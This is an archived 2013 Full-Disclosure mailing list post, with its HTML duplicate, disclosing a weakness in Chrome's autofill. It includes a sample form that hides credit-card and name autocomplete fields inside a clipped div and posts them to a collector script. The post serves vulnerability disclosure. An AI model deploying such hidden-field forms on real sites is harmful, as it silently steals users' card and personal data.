[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] How to take advantage of Chrome autofill feature to get sensitive information
From: "vulns () 11paths ! com" <vulns () 11paths ! com>
Date: 2013-10-31 14:15:50
Message-ID: 4225a2001dda41438403f428fdfdf3fa () DBXPR05MB016 ! eurprd05 ! prod ! outlook ! com
[Download RAW message or body]
At the end of 2010, Google introduced autofill in Chrome, a feature that may be a security \
problem for its users. Chrome's autofill allows to store postal addresses (divided in some \
other data like name, surname, telephone, postal code...) and credit card (divided in \
cardholder name, number and expiration date). For a form to take advantage of autofill feature, \
input fields has to be properly identified so Chrome knows what values go with them. There is a \
weakness that may allow an attacker to take advantage of this characteristic to obtain private \
information like an address or credit card data without the user noticing anything.
As a precaution, Chrome only fills up credit card number with autofill under https pages. This \
is not a problem for the attacker, since he just have to operate uner a SSL connection. Another \
precaution that Chrome takes, is to forbid "hidden" tag in autocomplete inputs. Chrome also \
avoids to fill up Autofill inputs if there is a div tag with visibility set to "hidden".
So a formula would be to take advantage of the scroll property, rising up the layer some pixels \
so the inputs used to steal information are unseen. In this case, the "decoy" form would be \
created by using this specially crafted "div", so we get to hide inside it all these inputs and \
the browser will not show them (but will autofill them):
<form action="recolector.php" method="post">
<div style="overflow:hidden;height:35px;">
Nombre <input id="cn" autocomplete="cc-name" ><br><br>
<input id="cc" autocomplete="cc-number" >
<input id="ce" autocomplete="cc-exp" >
<input id="c5" autocomplete="cc-exp" maxlength="5">
<input id="cg" autocomplete="cc-given-name">
<input id="ca" autocomplete="cc-additional-name">
<input id="cf" autocomplete="cc-family-name">
...
</div>
Chrome will fill up all that information without the user noticing anything. This weakness has \
been detected by Ricardo Mart?n from Eleven Paths (ricardo.martin@11paths.com). Full samples \
and detailed explanation is here: \
http://blog.elevenpaths.com/2013/10/how-to-take-advantage-of-chrome.html
[Attachment #3 (text/html)]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">
<style id="owaParaStyle" type="text/css" style="">
<!--
p
{margin-top:0;
margin-bottom:0}
-->
P {margin-top:0;margin-bottom:0;}</style>
</head>
<body aria-label="Cuerpo del mensaje" fpstyle="1" tabindex="0" dir="ltr">
<div name="divtagdefaultwrapper" id="divtagdefaultwrapper" style="font-family: \
Calibri,Arial,Helvetica,sans-serif; font-size: 12pt; color: #000000; margin: 0"> <span \
style="color:rgb(0,0,0); font-family:'Times New Roman'; font-size:medium; font-style:normal; \
font-variant:normal; font-weight:normal; letter-spacing:normal; line-height:normal; \
orphans:auto; text-align:start; text-indent:0px; text-transform:none; white-space:normal; \
widows:auto; word-spacing:0px; display:inline!important; float:none">At the end of 2010, \
Google introduced<span class="Apple-converted-space"> </span></span><span \
style="color:rgb(0,0,0); font-family:'Times New Roman'; font-size:medium; font-variant:normal; \
font-weight:normal; letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; \
text-indent:0px; text-transform:none; white-space:normal; widows:auto; \
word-spacing:0px">autofill</span><span style="color:rgb(0,0,0); font-family:'Times New Roman'; \
font-size:medium; font-style:normal; font-variant:normal; font-weight:normal; \
letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; text-indent:0px; \
text-transform:none; white-space:normal; widows:auto; word-spacing:0px; \
display:inline!important; float:none"><span class="Apple-converted-space"> </span>in \
Chrome, a feature that may be a security problem for its users. </span><span \
style="color:rgb(0,0,0); font-family:'Times New Roman'; font-size:medium; font-style:normal; \
font-variant:normal; font-weight:normal; letter-spacing:normal; line-height:normal; \
orphans:auto; text-align:start; text-indent:0px; text-transform:none; white-space:normal; \
widows:auto; word-spacing:0px; display:inline!important; float:none">Chrome’s autofill \
allows to store postal addresses (divided in some other data like name, surname, telephone, \
postal code...)</span><b style="color:rgb(0,0,0); font-family:'Times New Roman'; \
font-size:medium; font-style:normal; font-variant:normal; letter-spacing:normal; \
line-height:normal; orphans:auto; text-align:start; text-indent:0px; text-transform:none; \
white-space:normal; widows:auto; word-spacing:0px"><span \
class="Apple-converted-space"> </span></b><span style="color:rgb(0,0,0); \
font-family:'Times New Roman'; font-size:medium; font-style:normal; font-variant:normal; \
letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; text-indent:0px; \
text-transform:none; white-space:normal; widows:auto; word-spacing:0px"><span \
class="Apple-converted-space"></span>and credit card</span><span style="color:rgb(0,0,0); \
font-family:'Times New Roman'; font-size:medium; font-style:normal; font-variant:normal; \
font-weight:normal; letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; \
text-indent:0px; text-transform:none; white-space:normal; widows:auto; word-spacing:0px; \
display:inline!important; float:none"><span class="Apple-converted-space"> </span>(divided \
in cardholder name, number and expiration date). </span><span style="color:rgb(0,0,0); \
font-family:'Times New Roman'; font-size:medium; font-style:normal; font-variant:normal; \
font-weight:normal; letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; \
text-indent:0px; text-transform:none; white-space:normal; widows:auto; word-spacing:0px; \
display:inline!important; float:none">For a form to take advantage of autofill feature, input \
fields has to be properly identified so Chrome knows what values go with them. There is a \
weakness that may allow an attacker to</span><span style="color:rgb(0,0,0); font-family:'Times \
New Roman'; font-size:medium; font-style:normal; font-variant:normal; font-weight:normal; \
letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; text-indent:0px; \
text-transform:none; white-space:normal; widows:auto; word-spacing:0px; \
display:inline!important; float:none"> take advantage of this characteristic to obtain private \
information like an address or credit card data </span><span style="color:rgb(0,0,0); \
font-family:'Times New Roman'; font-size:medium; font-style:normal; font-variant:normal; \
font-weight:normal; letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; \
text-indent:0px; text-transform:none; white-space:normal; widows:auto; word-spacing:0px; \
display:inline!important; float:none"><b> </b>without the user noticing anything.<span \
class="Apple-converted-space"> <br> <br>
</span></span><span style="color:rgb(0,0,0); font-family:'Times New Roman'; font-size:medium; \
font-style:normal; font-variant:normal; font-weight:normal; letter-spacing:normal; \
line-height:normal; orphans:auto; text-align:start; text-indent:0px; text-transform:none; \
white-space:normal; widows:auto; word-spacing:0px; display:inline!important; float:none"><span \
class="Apple-converted-space"></span>As a precaution, Chrome<span \
class="Apple-converted-space"> </span></span><span style="color:rgb(0,0,0); \
font-family:'Times New Roman'; font-size:medium; font-style:normal; font-variant:normal; \
letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; text-indent:0px; \
text-transform:none; white-space:normal; widows:auto; word-spacing:0px">only fills up credit \
card number with autofill under https pages</span><span style="color:rgb(0,0,0); \
font-family:'Times New Roman'; font-size:medium; font-style:normal; font-variant:normal; \
font-weight:normal; letter-spacing:normal; line-height:normal; orphans:auto; text-align:start; \
text-indent:0px; text-transform:none; white-space:normal; widows:auto; word-spacing:0px; \
display:inline!important; float:none">. This is not a problem for the attacker, since he just \
have to operate uner a SSL connection. Another precaution that Chrome takes, is to forbid \
"hidden" tag in autocomplete inputs. Chrome also avoids to fill up Autofill inputs if \
there is a div tag with visibility set to "hidden".<br>
<br>
<font face="'Times New Roman', Times, serif" size="3">So a formula </font></span><font \
face="'Times New Roman', Times, serif" size="3"><span style="color: rgb(0, 0, 0); font-size: \
medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; \
line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: \
normal; word-spacing: 0px; display: inline ! important; float: none;">would be to take \
advantage of the scroll property, rising up the layer some pixels so the inputs used to steal \
information are unseen. In this case, the "decoy" form would be created</span> by \
using this specially crafted "div", so we get to hide inside it all these inputs and \
the browser will not show them (but will autofill them):</font> <p style="margin: 0px;"><font \
face="Courier New, Courier, monospace"><br> </font></p>
<font face="'Times New Roman', Times, serif"><form action="recolector.php" \
method="post"><br> <div \
style="overflow:hidden;height:35px;"><br> \
Nombre <input id="cn" \
autocomplete="cc-name" ><br><br><br> \
<input id="cc" autocomplete="cc-number" \
><br> <input id="ce" \
autocomplete="cc-exp" ><br> \
<input id="c5" autocomplete="cc-exp" \
maxlength="5"><br> \
<input id="cg" autocomplete="cc-given-name"><br> \
<input id="ca" \
autocomplete="cc-additional-name"><br> \
<input id="cf" \
autocomplete="cc-family-name"></font> <p style="margin: 0px;"><font face="'Times \
New Roman', Times, serif">...</font></p> <p style="margin: 0px;"><font face="'Times New Roman', \
Times, serif"></div></font></p> <p style="margin: 0px;"><br>
</p>
<p style="margin: 0px;"><font face="'Times New Roman', Times, serif"><span style="color: rgb(0, \
0, 0); font-size: medium; font-style: normal; font-variant: normal; letter-spacing: normal; \
line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: \
normal; word-spacing: 0px;">Chrome will fill up all that information without the user noticing \
anything.<span class="Apple-converted-space"></span></span><b style="color: rgb(0, 0, 0); \
font-size: medium; font-style: normal; font-variant: normal; letter-spacing: normal; \
line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: \
normal; word-spacing: 0px;"><span class="Apple-converted-space"> </span></b><span \
style="color: rgb(0, 0, 0); font-size: medium; font-style: normal; font-variant: normal; \
font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; \
text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; display: inline \
! important; float: none;">T</span>his weakness has been detected by Ricardo Martín \
from Eleven Paths (ricardo.martin@11paths.com). Full samples and detailed explanation is here: \
http://blog.elevenpaths.com/2013/10/how-to-take-advantage-of-chrome.html<br> </font></p>
<br>
</div>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============0887007618==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic